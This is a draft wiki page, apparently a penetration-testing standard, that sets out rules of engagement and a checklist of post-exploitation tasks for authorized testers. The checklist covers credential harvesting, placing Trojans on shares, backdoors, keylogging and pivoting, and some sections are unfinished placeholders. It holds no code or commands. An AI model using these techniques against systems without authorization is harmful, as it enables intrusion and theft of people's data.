Difference between revisions of "Post Exploitation Standard"

Purpose The purpose of the Post-Exploitation phase is to determine the value of the machine compromised and to maintain control of the machine for later use. The value of the machine is determined by the sensitivity of the data stored on it and the machines usefulness in further compromising the network. The methods described in this phase are meant to help the tester identify and document sensitive data, identify configuration settings, communication channels, and relationships with other network devices that can be used to gain further access to the network, and setup one or more methods of accessing the machine at a later time. In cases where these methods differ from the agreed upon Rules of Engagement, the Rules of Engagement must be followed.

Rules of Engagement The following Rules of Engagement are specific to the Post-Exploitation phase of a penetration test and are intended to ensure that the client’s systems are not subjected to unnecessary risk by the (direct or indirect) actions of the testers and to ensure a mutually agreed procedure to follow during the post-exploitation phase of the project. Protect the Client

   Unless previously agreed upon, there will be no modification of services which the client deems “critical” to their infrastructure.  The purpose of modifying such services would be to demonstrate to the client how an attacker may:
       Escalate privileges
       Gain access to specific data
       Cause denial of service
   All modifications, including configuration changes, executed against a system must be documented. After finishing the intended purpose of the modification, all settings should be returned to their original positions if possible. The list of changes should be given to the client after the engagement to allow them to ensure all changes were properly undone.
   A detailed log of actions taken against compromised systems must be kept.  The log should include the action taken and the time period in which it occurred.  Upon completion, this log should be included as an appendix to the final report.
   Any and all private and/or personal user data (including passwords and system history) uncovered during the course of the penetration test may be used as leverage to gain further permissions or to execute other actions related to the test only if the following conditions are met:
       The client’s Acceptable Use Policy states all systems are owned by the client and all data stored on those systems are the property of the client.
       The Acceptable Use Policy states connection to the client’s network is considered consent for the connected machine to be searched and analyzed (including all present data and configurations).
       The client has confirmation that all employees have read and understand the Acceptable Use Policy. 

   Passwords (including those in encrypted form) will not be included in the final report.  This is done to safeguard the confidentiality of the users the passwords belong to, as well as to maintain the integrity of the systems they protect.
   Any method or device used to maintain access to compromised systems and that could affect the proper operation of the system or whose removal may cause downtime may not be implemented without the prior written consent of the client.
   Any method or device which is used to maintain access to compromised systems must employ some form of user authentication such as digital certificates or login prompts.  A reverse connection to a known controlled system is also acceptable.
   All data gathered by the testers must be encrypted on the systems used by the testers.
   All data gathered will be destroyed once the client has accepted the final report. Method used and proof of destruction will be provided to the client.
   If data gathered is regulated by any law, the systems used and their locations will be provided by the client to ensure that the data collected and processed does not violate any applicable laws. If the systems will be those of the penetration testing team the data may not be downloaded and stored on to their systems and only proof of access will be shown (File Permissions, Record Count, file names..etc).
   Third party services for password cracking will not be used,  nor will there be sharing of any other type of data with third parties without the clients prior consent.
   In case a compromise of a system is found by a third party all logs with actions and times recorded during the assessment by the penetration team will be saved, hashed and provided to the client and the client will determine if an incident response plan should come to effect.
   No logs should be cleared or altered unless the client has authorized this in the engagement contract/statement of work. If it is to be done, a proper backup of such logs must first be made.

Protecting Yourself Due to the nature of a penetration test, you must ensure that you cover all your bases when dealing with the client and the tasks you will be performing. Discussions should take place with the client to clarify the following to ensure a clear understanding of the roles and responsibilities of both client and provider.

   Ensure that the contract and/or statement of work signed by both the client and provider that the actions taken on the systems being tested are on behalf and in representation of the client.
   Require prior to starting engagement that a copy of the security policies that govern user use of company systems and infrastructure is provided.  Verify that policy covers:

       Personal use of equipment and storage of personal employee data on the client systems and ownership and rights on that data.
       Ownership of data stored on company equipment.

   Confirm regulations and laws that govern the data that is managed and used by the client on their systems and the restrictions imposed on such data.
   Use full drive encryption for those systems that will receive and store the clients data.
   Discuss and establish with the client the procedures to follow in the case that a compromise from a third party is found.
   Check for laws concerning the capture of audio and video since the use of this methods in post-exploitation may be considered a violation of local or country wiretap laws.

Planning Carlos is writing this section based on the CARVER method. Environment Discovery Network Configuration The network configuration of a compromised machine can be used to identify additional subnets, network routers, critical servers, name servers and relationships between machine. This information can be used to identify additional targets or to compromise other machines. Interfaces Identify all of the network interfaces on the machine along with their IP address, subnet mask, and gateway. Routing Identify all static and dynamic routes on the machine. For multi-homed machines determine if it is acting as a router. DNS Servers Identify all DNS servers in use. Cached DNS Entries Identify high value DNS entries in the cache, which may include login pages for Intranet sites, management interfaces, or external sites. Proxy Servers Identify network level and application level proxy servers. ARP Entries Enumerate cached and static ARP table entries, which can reveal other hosts that interact with the compromised machine. Static ARP entries may represent critical machines. Network Services Listening Services Identify all the network services offered by the machine. This may lead to the discovery of services not identified by initial scanning as well as the discovery of other machines and networks. In addition, the tester may be able to leverage these services to compromise other machines. Most operating system include a method of identifying TCP and UDP connections made to and from the machine.

By checking both connections to and from a compromised machine it is possible to find relationships that were previously unknown. As well as the host the service should also be considered, this may reveal services listening on non-standard ports and indicate trust relationships such as keyless authentication for ssh. VPN Connections All VPN connections into and out of the machine or network should be identified. Outbound connections can give a path in to new systems which may not previously have been identified. Both in and outbound can identify new systems and possible business relationships if the connection is from a customer/supplier etc. VPN connections generally bypass firewalls and IDS/IPS due to them being unable to decrypt the traffic, this makes them idea to launch attacks through. If new targets are identified it should be confirmed as to whether they are in scope before launching attacks against them. Directory Services Need to fill this in. Neighbors Need to fill this in. Network Layout (net view /domain) Check the neighbourhood network/OS X browser (mdns? or bonjour) Data Gathering Pillaging talks to what information (files, links, documentation, etc.) the tester should be looking at using either as part of client requirements (personal information, credit card information etc.) or as part of the pivoting process to gain further access to the network. (matt) Installed Programs Startup Items

       List of applications and versions installed on the system.
       List of updates applied to the system.

Installed Services Security Services Firewall Status and ruleset.

HIPS, AV installed - Identifying countermeasures installed on a single compromised machine give an idea of what to expect when targeting other machines in the network. It also gives an idea of what alerts may have been triggered during the test, these can be discssed with the client during the project debrief

Security Policies, UAC, selinux, ipsec, windows security templates File/Printer Shares

   File Server configurations by protocol (SMB, AFP). - The configuration files can be used to identify shares which are available, who has access to them and their permissions. This can help with gaining remote access to the shares and in gathering information which can be used in other areas of attacks, for example user name enumeration which also can give hints on the roles of the users found.
   Shares offered by File Servers - Any file shares offered by target systems should be examined. Just by checking the names of the shares important information may be leaked such as the name of internal applications or projects
   Access Control Lists and permissions for shares. - From the client side, if it is possible to connect to the share, then it should be checked to see if the connection is read/only or read/write. Remember that if a share contains directories then different permissions may apply to different directories. From the server side both server configuration and file/directory permissions should be examined.
   Listing of content of shares
   Identification of files of interest (Source code, backups, installation files, confidential data..etc)
   Place Trojan files - Placing Trojans on popular shares can encourage network users to access them so triggering payloads.
   Place autorun files

Database Servers

   Databases
   Tables
   Table Content, row count for regulated content
   Permission
   Users, Passwords, Groups and Roles

Directory Servers

   List of objects (Users, passwords, Machines..etc)

Name Servers

   Enumerate allowed servers for zone transfer.
   Enumerate Records.
   Modify and Add Records.

Deployment Services

   Unattended answer files
   Permission on files
   Updates included
   Applications and versions
   Backdoor installation

Certificate Authority

   Root CA
   Enumeration Certificate Revocation List
   Enumeration issued certificates
   Try to insert Root CA Certificate
   Export certificate with private key

Source Code Management Server

   Enumerate projects - The project names can give away sensitive information on company projects.
   Verify access to source code files
   Modify source code files - If it is allowed in scope then modifying source code proves that an attacker could make changes that would affect the system
   Enumerate developers - Developers details can be use for social engineering attacks as well as as inputs for attacking other areas of the system
   Enumerate configuration

Dynamic Host Configuration Server

   Enumerate leases given
   Enumerate configuration
   Enumerate Options
   Modify configuration

Virtualization

   Enumerate Virtual Machines (name, configurations, OS)
   Enumerate passwords and digital certificates for administration systems.
   Enumerate virtualization software configuration

Messaging

   ????

Monitoring and Management

   ???

Networking Services (RADIUS,TACACS..etc)

   ???

Sensitive Data Key-logging By monitoring key strokes it is possible to detect sensitive information including passwords and PII - Don’t know what the legality of this is if the user is say chatting on private IM while also using company software, anyone know? If the company says that all data on the network can be monitored then this should be ok. If the second bullet point in Protect Yourself is present and it states that use of equipment can be monitored and no personal use is permitted yes, if policy does not cover personal user or ownership of data, no. It should be extended to cover Network also. Screen capture Network traffic capture Previous Audit reports User Information In this section the main focus is on the information present on the target system related to user accounts either present on the system or that have connected remotely and have left some trace that the personnel performing the assessment can gather and analyze for further penetration or provide the desired goal of the assessment. On System

   History files - History files store recent commands the user has executed. Reading through these can reveal system configuration information, important applications, data locations and other system sensitive information.
   Encryption Keys (SSH, PGP/GPG)
   Interesting Documents (.doc/x, .xls/x , password.*) - Users often store passwords and other sensitive information in clear text documents. These can be located in two ways, either searching through file names for interesting words, such as password.txt, or searching through the documents themselves. Indexing services can help with this, for example the Linux locate database.
   User specific application configuration parameters
   Individual Application History (MRU Windows only, history files..etc)
   Enumerate removable media
   Enumerate network shares / domain permission (gpresult)

Web Browsers

   Browser History
   Bookmarks
   Download History
   Credentials
   Proxies
   Plugins/Extensions

IM Clients

   Enumerate Account Configuration (User, Password, Server, Proxy)
   Chat Logs

System Configuration Password Policy By enumerating the systems password policy the ability to brute force and crack passwords becomes much more efficient, for example knowing that the minimum password length is 8 characters you can remove any word less than 8 characters from a dictionary. Security Policies Configured Wireless Networks and Keys By finding the targets wireless information it becomes possible to launch physical attacks through the companies wifi when on site. It can also allow a fake AP to be set up to lure targets to connect when away from site.

Data Exfiltration

Need someone to fill this in. Maintaining Access

   Installation of backdoor that requires authentication.
   Installation and/or modification of services to connect back to system. User and complex password should be used as a minimum; use of certificates or cryptographic keys is preferred where possible. (SSH, ncat, RDP). Reverse connections limited to a single IP may be used.
   Creation of alternate accounts with complex passwords.
   When possible backdoor must survive reboots. 

Gaining Further Access / Pivoting Pivoting is the action in which the tester will use his presence of on the compromised system to further enumerate and gain access to other systems on the client’s infrastructure. This action can be executed from the compromised host it self using local resourced or tools uploaded to the compromised system. From Compromised System

   Upload tools
   Use local system tools
   ARP Scan
   Ping Sweep
   DNS Enumeration of internal network
   Directory Services Enumeration
   Brute force attacks
   Enumeration and Management thru Management Protocols and compromised credentials (WinRM, WMI, SMB, SNMP..etc)
   Abuse of compromised credentials and keys (Webpages, Databases..etc)
   Execute Remote Exploits

Thru Compromised System

   Port Forwarding
   Proxy to internal network (SSH)
   VPN to internal network
   Execute Remote Exploit
   Abuse of compromised credentials and keys (Webpages, Databases..etc)

Cleanup The cleanup process covers the requirements for cleaning up systems once the penetration test has been completed. This will include all user accounts and binaries used during the test. (matt)

   Remove all executable, scripts and temporary file from a compromised system. If possible use secure delete method for removing the files and folders.
   Return to original values system settings and application configuration parameters if they where modified during the assessment.
   Remove all backdoors and/or rootkits installed.
   Remove any user accounts created for connecting back to compromise systems.